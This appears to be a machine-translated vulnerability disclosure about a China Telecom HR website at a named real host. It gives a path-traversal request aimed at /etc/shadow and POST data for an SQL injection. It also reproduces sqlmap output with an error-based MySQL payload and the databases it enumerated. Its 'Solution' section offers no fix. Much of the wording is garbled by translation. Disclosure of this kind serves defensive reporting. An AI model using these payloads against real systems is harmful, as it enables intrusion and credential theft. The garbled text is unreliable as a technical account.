SQL Injection + File Inclusion Vulnerability in a website of China Telecom

SQL Injection + File Inclusion Vulnerability in a website of China Telecom

Rear one: http://rs.hntelecom.net.cn/HRSystem/initIndex.do

BACKGROUND Two: http://rs.hntelecom.net.cn/loginadmin.do? M = login

Vulnerability Type 1:

The file contains: rs.hntelecom.net.cn/filedown.do? M = filedown & path = /.. /.. //.. /.. //.. /.. //.. /.. //.. /.. // etc/shadow % 00

 

No. root permission.

Vulnerability Type 2:

Address: rs.hntelecom.net.cn/search.do? M = search

Post Data: sss = test & Submit = % cb % d1 % 20% cb % f7 & ttt = test

Address: rs.hntelecom.net.cn/searchD.do? M = searchD

Post Data: sss = test & Submit = % cb % d1 % 20% cb % f7 & ttt = test

In other words, the two addresses are the same function. Is it interesting to create two addresses?
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: ttt    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause    Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl---available databases [4]:[*] information_schema[*] manpower[*] test[*] yiqilaifinddifferences

Solution:

There is a risk of further penetration.